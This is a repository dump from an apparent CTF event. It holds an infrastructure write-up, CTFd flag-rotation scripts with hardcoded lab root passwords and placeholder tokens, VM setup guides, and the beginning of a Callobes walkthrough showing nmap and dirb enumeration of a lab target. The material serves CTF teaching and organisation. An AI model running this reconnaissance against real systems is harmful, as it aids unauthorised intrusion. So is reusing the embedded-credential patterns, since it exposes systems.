Repository layout (image and screenshot files are summarised per directory):

```
.
├── README.md
├── Game Of Thrones
│   ├── README.md
│   ├── Architecture
│   │   ├── README.md
│   │   ├── Writeup.md
│   │   └── images/  (Architecture.svg, Log.gif, dracarys.gif, game.jpg, ssh-mitm.svg, trust.gif)
│   ├── CTF Platform
│   │   ├── README.md
│   │   ├── blitz_overwrite.py
│   │   ├── completion_checker.sh
│   │   ├── db_flag_regeneration.py
│   │   └── total_overwrite.sh
│   └── Machines
│       ├── README.md
│       ├── Blitz       (README.md, Walkthrough.md, Screenshots/)
│       ├── Bytescribe  (README.md, Walkthrough.md, Screenshots/)
│       ├── Callobes    (README.md, Walkthrough.md, Screenshots/)
│       ├── Captivity   (README.md, Walkthrough.md, Screenshots/)
│       ├── Gitlab      (README.md, Walkthrough.md, Screenshots/)
│       └── NoteApp     (README.md, Walkthrough.md, Screenshots/)
└── Who Am I
    ├── README.md
    ├── ctf_submission_logs.csv
    └── Writeups
        ├── C1 - Death Token Challenge       (README.md, Writeup.md, images/)
        ├── C2 - Decode the Escape           (README.md, Writeup.md, images/)
        ├── C3 - ANAIS_WATT3RS0N             (README.md, Writeup.md, images/)
        ├── C4 - #exec cmd=whoami            (README.md, Writeup.md, images/)
        ├── C5 - Packet Detective            (README.md, Writeup.md, challenge.pcapng, images/)
        ├── C6 - Exorcising Sukuna’s Curse   (README.md, Writeup.md, images/)
        ├── C7 - Root Reaper Quest           (README.md, writeup.md, audit.log, images/)
        ├── C8 - In Quest for Rogue Dragon   (README.md, Writeup.md, rev.exe, Images/)
        ├── C9 - End of Rumbling             (README.md, writeup.md, images/)
        ├── C10 - Shadows Possession Jutsu   (README.md, Writeup.md, images/)
        ├── C11 - Serial Escape              (README.md, Writeup.md, images/)
        └── C12 - Mr. Windoclin              (README.md, Writeup.md, images/)
```

/Game Of Thrones/Architecture/README.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Architecture/README.md
--------------------------------------------------------------------------------
/Game Of Thrones/Architecture/Writeup.md:
--------------------------------------------------------------------------------
# Did the Winter really come to Westeros? Engineering the GoT CTF

# Introduction

This is an abstraction of the technical preparation timeline of the "Game Of Thrones" CTF. The write-up is an honest confession of our design, plans and choices, their pros and cons, and what we did well and not so well throughout the process.

"Game of Thrones" - **a power struggle: who has it, who wants it and how they plan to get it.**

This is your view as the Challenger of the Throne:

**In the perilous realm of Westeros, flags hold power as coveted as the Iron Throne itself. Dive into the intricate web of challenges, where every capture brings you closer to ruling the Seven Kingdoms. Beware, for in this game of flags, you win or you lose. Only the cunning and brave will seize the throne and reign supreme.**

This was the player's challenge to overcome, but what about the Throne: how does it choose the next ruler? What sacrifices and risks must the player take while fighting their way through? Let's build our Throne and let it wait for its next ruler to come!

![game.jpg](images/game.jpg)

### Deep Note

This is not a deep-dive engineering blog that intends to surprise the reader by solving a complex riddle of a great technological problem.

It is a not-so-technical blog of nerdy non-engineers engineering their way towards answers to a bunch of their what-if questions.

Did we really overcome the Winter? What about the White Walkers? We will see it together!

# Challenges of Building a Throne

Our final goal was to implement a CTF environment that fulfilled the following ideas:

- No regulations by design - no rules are imposed on players, no ethics applied!
- Same-Machine-All-Players - each challenge machine has exactly one instance at any given time, and every player has to find their way through that same machine.
- Since any player may have malicious intent (remember, no ethics applied!), there is no restriction inside the machines. However, players can be caught by the City Watch (police) while or after committing a crime, so we needed to implement our own version of "The City Watch".

In summary, we had to build a "healthy" infrastructure that maintains a consistent, unbroken scheme throughout the CTF lifecycle.

## Design Challenges

- Source of trust - static points that players (of any intent) cannot interfere with.
- Logging - a consistent logging mechanism, and a plan for what to do with the collected logs.
- Automation - the ability to trigger vital actions (too complex for fully manual work) to keep things under control.
- Design of Infrastructure - resource planning and optimisation of the structure's elements.

Time for some solutions!

# Overcoming (Building The Throne)

## Discovering a Source of Trust

We first tried to make or find solid Source of Trust point(s) in the CTF architecture that would give us complete control over the structure, with the goal of keeping the system consistent and more resilient.

**Proxy 'em all!**

Our initial thought was to implement some kind of logical proxy: a point that gives us first-hand control before and/or after players compromise the vulnerable machines.

If we could implement this proxy logic, that would be our actual Source of Trust!

## Logging The Unknown

This was challenging, as we needed to log the actions of each player in order to trace any issue that arose. Since all players would play in the same perimeter, we had to monitor malicious actions and revert the machines in a way that did not disturb the CTF cycle.

As these logs play a crucial role in the structure, they must not be tampered with in any way.

**Conclusion**

After some (and some more) failed attempts, we concluded that we needed a way to log OS-level actions (commands) independently of the access type (SSH, FTP or any other). If we could not handle this universally, it would be disastrous, as each protocol (thousands of them!) has its own characteristics to handle.

Here the "Source of Trust" proxy idea came back to us: if our proxy handled traffic universally (one entry point), we could use it for standardised logging!

For the "one entry point" we wanted to use SSH. Initially it was a great idea, but how do we log SSH?

**One ssh-mitm to rule 'em all!**

*[SSH-MITM](https://github.com/ssh-mitm/ssh-mitm) is a man-in-the-middle SSH server for security audits and malware analysis.*

![ssh-mitm.svg](images/ssh-mitm.svg)

Basically, we wanted to intercept all traffic through the SSH server and log all of it, which led us to another problem: if we settled on ssh-mitm, where would it connect to (SSH forwarding)?

After more attempts and failures, we came up with the idea of using intermediary system(s) to operate from. That is when we decided to put the "Attack Box" logic into action. It is a well-known way of providing players with a stable, predefined attack machine to engage with and launch attacks from against the target system.

We employed this logic as the SSH endpoint reached through ssh-mitm, which improved the reliability and consistency of our system for all users.

**Web of web**

Later we also decided to proxy the HTTP traffic separately, directly through Nginx. HTTP by itself covers most of the network traffic (at least in our CTF). Additionally, requiring CTF players to work through a command-line interface (SSH) would pose a significant obstacle when testing for web application vulnerabilities: they would be unable to use well-known web application pentesting tools (Burp Suite, ZAP, etc.).

Now our logging environment was defined, and after some custom configuration of the ssh-mitm tool and the Nginx proxy itself we were able to *capture the unknown*!

![Log.gif](images/Log.gif)

## Some Automation?

Much of the automation revolved around the flag mechanism, which plays a vital role in the CTF platform.

Under the hood we used the CTFd platform, an excellent open-source tool designed for Capture The Flag scenarios, with a user-friendly interface and a high degree of customisability.

With the goal of making the flag mechanism (generation, submission and pushing) reliable, we implemented automation according to our CTF strategy and requirements. We will not go into details but give a general overview of the customisation and the role of automation:

- Flag Regeneration - to (re)generate flags under certain conditions (e.g. preventing the reuse of the same flag).
- Flag Submission - to notify us of a particular team's progress in solving a machine (such as locating all flags), so that we can take protective measures (such as disabling that team's access to the machine).
- Flag Placement - to upload (re)generated flags to the CTF machines and notify us of failed push actions (which indicate network errors and/or malicious actions by players), allowing us, for instance, to revert damaged machines.
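The three automation steps above, written out as an added example; this is not code from the ICSD repository, whose own scripts appear later on this page. It covers flag generation from the OS CSPRNG instead of a timestamp hash, the PATCH body CTFd expects for a static flag, the "every challenge of the category has a correct submission" check behind the Flag Submission notification, and the remote command that places a flag file. All functions are pure so the module runs offline; the CTFd endpoints and the Telegram call are only named in comments. The `ICSD{<32 hex>}` format and the `rm`/`printf`/`chown`/`chmod` sequence follow the repository's scripts, while the function names, `correct_count_for` (a stand-in for the submissions API) and the example paths are this example's own assumptions.

```python
"""Flag lifecycle helpers for a CTFd-backed CTF: generate, store, check, place.

Added example (not from the ICSD repository). Pure functions only, so the
module runs offline; the CTFd and Telegram calls are named in comments.
"""
import re
import secrets
import shlex

# ICSD{<32 lowercase hex>}: the shape used by the repository's regeneration script.
FLAG_RE = re.compile(r"^ICSD\{[0-9a-f]{32}\}$")


def generate_flag() -> str:
    """Fresh flag from the OS CSPRNG (secrets.token_hex(16) = 128 random bits).

    Hashing a wall-clock timestamp with md5 gives the same shape but is
    guessable: knowing the regeneration time to the second leaves ~1e6
    microsecond candidates to brute-force.
    """
    return f"ICSD{{{secrets.token_hex(16)}}}"


def flag_is_valid(flag: str) -> bool:
    """True only for exactly one well-formed flag; checked before any flag is
    interpolated into an API body or a remote shell command."""
    return FLAG_RE.fullmatch(flag) is not None


def ctfd_flag_patch(flag_id: int, flag: str) -> dict:
    """Body for PATCH /api/v1/flags/<flag_id> (CTFd static flag)."""
    if not flag_is_valid(flag):
        raise ValueError(f"refusing to store malformed flag {flag!r}")
    return {"id": str(flag_id), "type": "static", "data": "", "content": flag}


def team_finished_machine(challenge_ids, correct_count_for) -> bool:
    """Flag Submission step: a team has finished a machine when every challenge
    of that category has a correct submission from the team.

    correct_count_for(challenge_id) stands in for
    GET /api/v1/submissions?team_id=..&challenge_id=..&type=correct
    -> meta.pagination.total. An empty category never counts as finished.
    """
    ids = list(challenge_ids)
    return bool(ids) and all(correct_count_for(cid) >= 1 for cid in ids)


def flag_write_command(path: str, flag: str, owner: str = "", mode: str = "600") -> str:
    """Flag Placement step: the remote shell command that (re)places one flag file.

    Every operand is shlex-quoted, so a path such as "/tmp/x; id" is passed
    as one literal argument, and the flag is validated before it is used at all.
    Files with an owner are chowned to owner:owner; mode is always applied.
    """
    if not flag_is_valid(flag):
        raise ValueError(f"refusing to push malformed flag {flag!r}")
    q_path = shlex.quote(path)
    parts = [f"rm -f {q_path}", f"printf '%s\\n' {shlex.quote(flag)} > {q_path}"]
    if owner:
        parts.append(f"chown {shlex.quote(owner + ':' + owner)} {q_path}")
    parts.append(f"chmod {shlex.quote(mode)} {q_path}")
    return " && ".join(parts)


if __name__ == "__main__":
    flag = generate_flag()
    print(ctfd_flag_patch(42, flag))
    print(flag_write_command("/home/git/user2.txt", flag, owner="git"))
```

The validation step is what makes the quoting defensible: the flag is read back from the CTFd database, so anyone who can edit a flag there (an admin account, or a stolen API token) would otherwise get a shell command executed as root on every push.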
**Note** - these are highly simplified descriptions with some actions left out, just a very general picture of them.

Now that we have discussed everything that brings us to the final form, let's take a look at the actual scheme!

## Design of Infrastructure

![Architecture.svg](images/Architecture.svg)

This is a somewhat simplified version of the general architecture of the GoT CTF!

Let's summarise the design flow:

- Players test web apps (HTTP) hosted on the vulnerable machines - proxied directly through Nginx, with virtual hosting (to avoid port and/or service/daemon collisions), to the CTF machines.
- Players test the other services hosted on the vulnerable machines - proxied through Nginx to an ssh-mitm instance, then forwarded to the actual SSH server of the Attack Box, and from there to the underlying daemon.
- Attack Boxes are not allowed HTTP connectivity to the CTF machines, so that our "HTTP proxy" logic cannot be bypassed.
- SSH-MITM and HTTP proxy logs are forwarded to an Elasticsearch instance for indexing and storage.
- CTF players have direct access to the CTF platform (CTFd) and to the Elasticsearch instance (blue teaming).
- Scripts on the machine where CTFd is deployed constantly push the flags (which are regenerated frequently) to the vulnerable machines, every 2 minutes. If a push fails, we are notified via Telegram (to detect a possible intrusion).

This is our final design; before reaching it we followed some side paths that were eliminated over time. Let's look at some of them.

### Failures of the Success

The most notable (critical) design eliminations:

- Logging actions and traffic directly from the CTF machines was initially the most straightforward and convenient choice, but those logs would live on the very machines the players compromise. In fact, this was the motivation behind seeking a static Source of Trust that would remain untouched.
- SSH tunneling - we initially thought of using SSH as a tunnel, forcing player devices to connect through it. However, we realised that even with the SSH tunnel in place the communication would still be end-to-end. That means we would not be able to intercept it, as the connection would still be protocol-level activity (no static-point logic actually achieved). As a result, we ruled out this option.
- To establish an SSH connection from ssh-mitm we needed an intermediary boundary, as discussed earlier. Initially we considered forwarding that connection directly to the Nginx host for simplicity. However, this posed a significant problem: if a (potentially malicious) player managed to execute commands there, even with limited privileges, it would compromise our "Source of Trust". So we discarded this option.
- And the list goes on!

# Conclusion

So this is a refined version of tons of failed attempts, a showcase, right?! Maybe!

While building the CTF within the given time and resource limitations, we tried to produce something tangible that lives up to the promise. The architecture may have weak points depending on the viewer (as it does for us); it is a raw idea that we managed to make concrete, at least to some extent, and it is definitely open for further development and refinement!

It is worth recognising that creation frequently requires deconstructing and reconstructing a thing, allowing it to continually re-emerge.

Now let the fun begin! Dracarys!
**Perchance the winter has descended upon us, but the Night King, he hath not emerged in this season’s cold embrace!**
--------------------------------------------------------------------------------
/Game Of Thrones/Architecture/images/ (Log.gif, dracarys.gif, game.jpg, trust.gif): binary files referenced from Writeup.md; raw copies at
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Architecture/images/<file>
--------------------------------------------------------------------------------
/Game Of Thrones/CTF Platform/blitz_overwrite.py:
--------------------------------------------------------------------------------
```python
#!/usr/bin/env python3
"""Push the current CTFd flags of the Blitz machine onto the box over SSH.

Runs every 2 minutes from total_overwrite.sh. Any failure (no SSH access,
stderr output from the remote command, unexpected exception) is reported to
the organisers' Telegram group, since a failed push may mean a player broke
or locked down the machine.
"""
import shlex
import sys

import paramiko
import requests

# Replace with your actual CTFd token, machine category and SSH credentials.
CTFD_URL = "http://localhost:8000"
BEARER_TOKEN = "ctfd_sampleToken"
MACHINE = "blitz"
SERVER_IP = "10.20.52.2"
SSH_USERNAME = "root"
SSH_PASSWORD = "PasswordOfRoot"
TELEGRAM_BOT_URL = "https://api.telegram.org/botTokenProvidedByTelegram/sendMessage"
TELEGRAM_CHAT_ID = "TelegramGroupChatId"

HEADERS = {
    "Authorization": f"Token {BEARER_TOKEN}",
    "Content-Type": "application/json",
}

# Challenge name in CTFd -> (path on the machine, owner). Files with an owner
# are chowned to owner:owner and chmod 600; the others stay root-owned.
FLAG_TARGETS = {
    "user1.txt": ("/user1.txt", None),
    "user2.txt": ("/home/git/user2.txt", "git"),
    "user3.txt": ("/home/node/user3.txt", "node"),
    "root.txt": ("/root/root.txt", None),
}


def send_telegram_message(text):
    requests.post(TELEGRAM_BOT_URL, data={
        "chat_id": TELEGRAM_CHAT_ID,
        "text": "Overwriter script - error in Blitz machine - " + text,
    })


def write_flag(ssh_client, path, flag, owner):
    # The flag comes from the CTFd database; quote it (and the path) so that
    # nothing in it is interpreted by the remote shell.
    q_path, q_flag = shlex.quote(path), shlex.quote(flag)
    command = f"rm -f {q_path} && printf '%s\\n' {q_flag} > {q_path}"
    if owner:
        command += f" && chown {owner}:{owner} {q_path} && chmod 600 {q_path}"
    _stdin, _stdout, stderr = ssh_client.exec_command(command)
    error_message = stderr.read().decode("utf-8")
    if error_message:
        send_telegram_message(error_message)
        print("ERROR " + error_message)
    print(f"SSHing {flag} into {path}")


def main():
    ssh_client = paramiko.SSHClient()
    # AutoAddPolicy trusts whatever host key the machine presents; a pinned
    # known_hosts entry for SERVER_IP would detect a player-swapped sshd.
    ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        ssh_client.connect(SERVER_IP, username=SSH_USERNAME, password=SSH_PASSWORD, timeout=10)
    except Exception:
        send_telegram_message("no SSH access")
        sys.exit(1)

    try:
        response = requests.get(f"{CTFD_URL}/api/v1/challenges?category={MACHINE}", headers=HEADERS)
        if response.status_code != 200:
            print(f"BLITZ Failed to retrieve challenges. Status Code: {response.status_code}")
            return
        for challenge in response.json()["data"]:
            challenge_id, challenge_name = challenge["id"], challenge["name"]
            flags_response = requests.get(f"{CTFD_URL}/api/v1/flags?challenge_id={challenge_id}", headers=HEADERS)
            if flags_response.status_code != 200:
                print(f"BLITZ Failed to retrieve flags for Challenge {challenge_id}. Status Code: {flags_response.status_code}")
                continue
            flag = flags_response.json()["data"][0]["content"]
            if challenge_name not in FLAG_TARGETS:
                print("ERROR . CHALLENGE NOT FOUND IN OVERWRITE BLITZ")
                continue
            path, owner = FLAG_TARGETS[challenge_name]
            write_flag(ssh_client, path, flag, owner)
    except Exception as e:
        send_telegram_message(str(e))
        print(f"BLITZ An error occurred: {e}")
    finally:
        ssh_client.close()


if __name__ == "__main__":
    main()
```
--------------------------------------------------------------------------------
/Game Of Thrones/CTF Platform/completion_checker.sh:
--------------------------------------------------------------------------------
```bash
#!/bin/bash
# Usage: completion_checker.sh <team_id> <team_name> <challenge_category>
# Run after a correct submission; notifies the Telegram group once the team
# has a correct submission for every challenge of the machine (category).

if [ $# -ne 3 ]; then
    echo "usage: $0 <team_id> <team_name> <challenge_category>" >&2
    exit 1
fi

team_id=$1
team_name=$2
challenge_category=$3

ctfd_url="http://localhost:8000"
ctfd_token="ctfd_sampletoken"
telegram_bot="botTokenProvidedByTelegram"
telegram_chat="groupChatIdHere"

ctfd_get() {
    curl -sS -X GET "$1" \
        --header "Authorization: Token ${ctfd_token}" \
        --header "Content-Type: application/json"
}

mapfile -t challenge_ids < <(ctfd_get "${ctfd_url}/api/v1/challenges?category=${challenge_category}" | jq -r '.data[].id')

# A category with no challenges can never be completed.
if [ ${#challenge_ids[@]} -eq 0 ]; then
    exit 0
fi

all_completed=true
for id in "${challenge_ids[@]}"; do
    # Number of correct submissions of this team for this challenge.
    count=$(ctfd_get "${ctfd_url}/api/v1/submissions?team_id=${team_id}&challenge_id=${id}&type=correct" | jq -r '.meta.pagination.total')
    if [ "$count" != "1" ]; then
        all_completed=false
        break
    fi
done

if [ "$all_completed" = true ]; then
    curl -sS -X GET "https://api.telegram.org/bot${telegram_bot}/sendMessage?chat_id=${telegram_chat}&text=Team_${team_id}_finished_machine_${challenge_category}"
fi
```
--------------------------------------------------------------------------------
/Game Of Thrones/CTF Platform/db_flag_regeneration.py:
--------------------------------------------------------------------------------
```python
#!/usr/bin/env python3
"""Regenerate the static flags stored in the CTFd database.

Usage: db_flag_regeneration.py --all        (every challenge)
       db_flag_regeneration.py <category>   (one machine)

The new value is written with PATCH /api/v1/flags/<id>; the overwrite
scripts then push it onto the machines on their next run.
"""
import datetime
import hashlib
import json
import sys

import requests

CTFD_URL = "http://localhost:8000"
BEARER_TOKEN = "ctfd_sampletoken"
HEADERS = {
    "Authorization": f"Token {BEARER_TOKEN}",
    "Content-Type": "application/json",
}


def new_flag_for(flag_id, machine, challenge_name):
    # md5 of "<now>;<flag_id>;<machine>;<challenge name>". Note that this is
    # derived from the wall clock, not from a CSPRNG: a player who can guess
    # the regeneration time to the second has only ~1e6 microsecond
    # candidates to hash. secrets.token_hex(16) would give the same
    # ICSD{32 hex} shape with 128 unguessable bits.
    ct = str(datetime.datetime.now())
    pre_hash = f"{ct};{flag_id};{machine};{challenge_name}"
    return f"ICSD{{{hashlib.md5(pre_hash.encode('utf-8')).hexdigest()}}}"


def main(argv):
    if not argv or not argv[0]:
        print(__doc__)
        sys.exit(1)
    option = argv[0]
    if option == "--all":
        request_url = f"{CTFD_URL}/api/v1/challenges"
        print("Generating flags in DB for all machines.")
    else:
        request_url = f"{CTFD_URL}/api/v1/challenges?category={option}"
        print(f"Generating flags in DB for {option} machine")

    challenges_response = requests.get(request_url, headers=HEADERS)
    if challenges_response.status_code != 200:
        print(f"Failed to retrieve challenges. Status Code: {challenges_response.status_code}")
        sys.exit(1)

    for challenge in challenges_response.json()["data"]:
        challenge_id = challenge["id"]
        challenge_name = challenge["name"]
        machine = challenge["category"]
        flags_response = requests.get(f"{CTFD_URL}/api/v1/flags?challenge_id={challenge_id}", headers=HEADERS)
        if flags_response.status_code != 200:
            print(f"Failed to retrieve flags for challenge {challenge_id}. Status Code: {flags_response.status_code}")
            continue
        # Each challenge carries one static flag; rewrite it in place.
        flag_id = flags_response.json()["data"][0]["id"]
        flag_change_data = {
            "content": new_flag_for(flag_id, machine, challenge_name),
            "data": "",
            "type": "static",
            "id": str(flag_id),
        }
        response = requests.patch(f"{CTFD_URL}/api/v1/flags/{flag_id}", data=json.dumps(flag_change_data), headers=HEADERS)
        if response.status_code != 200:
            print(f"Failed to update flag {flag_id}. Status Code: {response.status_code}")


if __name__ == "__main__":
    main(sys.argv[1:])
```
--------------------------------------------------------------------------------
/Game Of Thrones/CTF Platform/total_overwrite.sh:
--------------------------------------------------------------------------------
```bash
#!/bin/bash
# Run every machine's overwrite script in parallel; each one pushes the
# current DB flags of its machine. Scheduled every 2 minutes.
scripts_dir=/home/ctf-platform/Desktop/CTFd/CTFd/api/v1/ctfd_scripts/overwrite_scripts

for machine in blitz captivity bytescribe bytescribe_docker noteapp gitlab callobes; do
    python3 "${scripts_dir}/${machine}_overwrite.py" &
done
```
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Blitz/README.md:
--------------------------------------------------------------------------------
# Setup

1. Use the installation link to download the .ova file.
2. Import the image file into VMware using File -> Open.
   > [!WARNING]
   > The images are not supported by VirtualBox.

3. Choose a virtual machine name and location for the new VM.
4. The default network interface is configured as NAT. If it is not, set it to NAT.
5. Find the IP address of the machine with arp-scan from your Kali machine:
```
┌──(kali㉿kali)-[~/Captivity]
└─$ sudo arp-scan -l
[sudo] password for kali:

Interface: eth0, type: EN10MB, MAC: 00:0c:29:ee:f4:ad, IPv4: 192.168.100.132
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.100.1   00:50:56:c0:00:08   VMware, Inc.
192.168.100.2   00:50:56:e5:ad:c6   VMware, Inc.
192.168.100.131 00:0c:29:d5:b9:3e   VMware, Inc.
192.168.100.254 00:50:56:fa:13:b9   VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.005 seconds (127.68 hosts/sec). 4 responded

┌──(kali㉿kali)-[~/Captivity]
└─$ ssh root@192.168.100.131
root@192.168.100.131's password:
Welcome to Ubuntu 23.04 (GNU/Linux 6.2.0-33-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

68 updates can be applied immediately.
22 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable

Last login: Thu Sep 28 09:13:52 2023 from 192.168.100.1
root@blitz:~# exit
logout
Connection to 192.168.100.131 closed.
```
6. If something goes wrong, use the credentials below to access the machine.

# Credentials
```
root:3AsaFRMwkdmBMQwuC4sr
```
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Blitz/Screenshots/ (binary files; raw copies at
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/<file>):
admin-access-denied.png, admin-create-new-product.png, admin-panel-landing.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Bytescribe/README.md:
--------------------------------------------------------------------------------
# Setup

1. Use the installation link to download the .ova file.
2. Import the image file into VMware using File -> Open

![image](Screenshots/Screenshot-2023-10-06-024100.png)

> [!WARNING]
> The images are not supported by VirtualBox.

3. Choose a virtual machine name and location for the new VM.
4. The default network interface is configured as NAT. If it is not, set it to NAT.
5. You can find the IP address of the machine with arp-scan from your Kali machine.
```
┌──(kali㉿kali)-[~]
└─$ sudo arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:f7:91:2b, IPv4: 192.168.163.133
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.163.1   00:50:56:c0:00:08   VMware, Inc.
192.168.163.2   00:50:56:e9:26:ad   VMware, Inc.
192.168.163.135 00:0c:29:15:64:ff   VMware, Inc.
192.168.163.254 00:50:56:fb:dd:06   VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.018 seconds (126.86 hosts/sec). 4 responded

┌──(kali㉿kali)-[~]
└─$ ssh root@192.168.163.135
The authenticity of host '192.168.163.135 (192.168.163.135)' can't be established.
ED25519 key fingerprint is SHA256:FgEM7djbdkf6qtvyLOr4TPV35vMzjmXSJ09Cm8VHB8k.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.163.135' (ED25519) to the list of known hosts.
root@192.168.163.135's password:
Permission denied, please try again.
root@192.168.163.135's password:
Permission denied, please try again.
root@192.168.163.135's password:
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 6.2.0-33-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

Expanded Security Maintenance for Applications is not enabled.

28 updates can be applied immediately.
27 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status

Last login: Thu Sep 14 21:15:45 2023 from 10.1.3.1
root@bytescribe-virtual-machine:~#

```
6. If something goes wrong, use the credentials provided below to access the machine.

# Credentials
```
root:qpWO10@(
```

--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Callobes/README.md:
--------------------------------------------------------------------------------
# Setup

1. Use the installation link to download the .ova file.
2. Import the image file into VMware using File -> Open

![Alt text](Screenshots/image-1.png)

> [!WARNING]
> The images are not supported by VirtualBox.

3. Choose a virtual machine name and location for the new VM.
4. The default network interface is configured as NAT. If it is not, set it to NAT.
5. You can find the IP address of the machine with arp-scan from your Kali machine.
```
┌──(kali㉿kali)-[~]
└─$ sudo arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:2e:e5:cf, IPv4: 192.168.121.128
Starting arp-scan 1.9.8 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.121.1   00:50:56:c0:00:08   VMware, Inc.
192.168.121.2   00:50:56:f2:3b:82   VMware, Inc.
192.168.121.129 00:0c:29:c7:d8:5e   VMware, Inc.
192.168.121.254 00:50:56:e4:f5:4c   VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.8: 256 hosts scanned in 2.050 seconds (124.88 hosts/sec). 4 responded

┌──(kali㉿kali)-[~]
└─$ ssh root@192.168.121.129
root@192.168.121.129's password:
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 5.3.0-53-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

 * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
   just raised the bar for easy, resilient and secure K8s cluster deployment.

   https://ubuntu.com/engage/secure-kubernetes-at-the-edge

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

74 packages can be updated.
28 updates are security updates.

New release '20.04.6 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Your Hardware Enablement Stack (HWE) is supported until April 2023.
Last login: Fri Oct 6 04:20:37 2023 from 192.168.121.128
root@shimishao:~#
```

6. If something goes wrong, use the credentials provided below to access the machine.

# Credentials
```
root:1qaSDFgtr
```

--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Callobes/Walkthrough.md:
--------------------------------------------------------------------------------
# Callobes

This machine is taken from [Vulnhub](https://www.vulnhub.com/entry/election-1,503/) to support the idea of open source! We intend to continue sharing our projects as open source in the future.

There are several ways to exploit the machine, and we are currently sharing one method. You are encouraged to explore and discover other paths independently.

## High Level Overview
"Callobes" is an easy Linux-based Capture The Flag (CTF) machine that presents an engaging and challenging cybersecurity scenario. Here's a brief overview:
This machine runs both a web server and an SSH server. The web server has a path traversal vulnerability that exposes a crucial piece of information, specifically credentials, in a file.
Once you have gained an initial foothold, you'll discover a setuid binary named "Serv-U". This binary holds the key to escalating your privileges and potentially achieving root access on the system.
"Callobes" will challenge your skills in web exploitation, Linux privilege escalation, and potentially other areas of cybersecurity, making it an exciting platform for honing your penetration testing abilities.

## Enumerating the target
Run a full-range port scan to find all open ports.

```
┌──(kali㉿kali)-[~]
└─$ nmap -p- 192.168.121.129
Starting Nmap 7.93 ( https://nmap.org ) at 2023-10-05 19:10 EDT
Nmap scan report for 192.168.121.129
Host is up (0.00028s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 2.93 seconds

```
Nmap found two open TCP ports (22 and 80).

Navigating to the IP address in a browser, we see the following.

![Alt text](Screenshots/image-2.png)

Let's run a directory brute-force with dirb:
```
┌──(kali㉿kali)-[~]
└─$ dirb http://192.168.121.129

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Thu Oct  5 19:47:57 2023
URL_BASE: http://192.168.121.129/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.121.129/ ----
+ http://192.168.121.129/index.html (CODE:200|SIZE:10918)
==> DIRECTORY: http://192.168.121.129/javascript/
+ http://192.168.121.129/phpinfo.php (CODE:200|SIZE:95537)
==> DIRECTORY: http://192.168.121.129/phpmyadmin/
+ http://192.168.121.129/robots.txt (CODE:200|SIZE:31)
+ http://192.168.121.129/server-status (CODE:403|SIZE:280)

```
dirb gives us accessible directories as well as the index.html and robots.txt files. Note the robots.txt entry in the output above.

First, open the robots.txt file. It lists four entries, as seen below.

![Alt text](Screenshots/image-3.png)

Only the shimishao directory is actually accessible to us.

Run dirb again against the shimishao directory:
```
┌──(kali㉿kali)-[~]
└─$ dirb http://192.168.121.129/shimishao

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Thu Oct  5 19:58:42 2023
URL_BASE: http://192.168.121.129/shimishao/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.121.129/shimishao/ ----
==> DIRECTORY: http://192.168.121.129/shimishao/admin/
==> DIRECTORY: http://192.168.121.129/shimishao/data/
+ http://192.168.121.129/shimishao/index.php (CODE:200|SIZE:6597)
==> DIRECTORY: http://192.168.121.129/shimishao/js/
==> DIRECTORY: http://192.168.121.129/shimishao/languages/
==> DIRECTORY: http://192.168.121.129/shimishao/lib/
==> DIRECTORY: http://192.168.121.129/shimishao/media/
==> DIRECTORY: http://192.168.121.129/shimishao/themes/

---- Entering directory: http://192.168.121.129/shimishao/admin/ ----
==> DIRECTORY: http://192.168.121.129/shimishao/admin/ajax/
==> DIRECTORY: http://192.168.121.129/shimishao/admin/components/
==> DIRECTORY: http://192.168.121.129/shimishao/admin/css/
==> DIRECTORY: http://192.168.121.129/shimishao/admin/img/
==> DIRECTORY: http://192.168.121.129/shimishao/admin/inc/
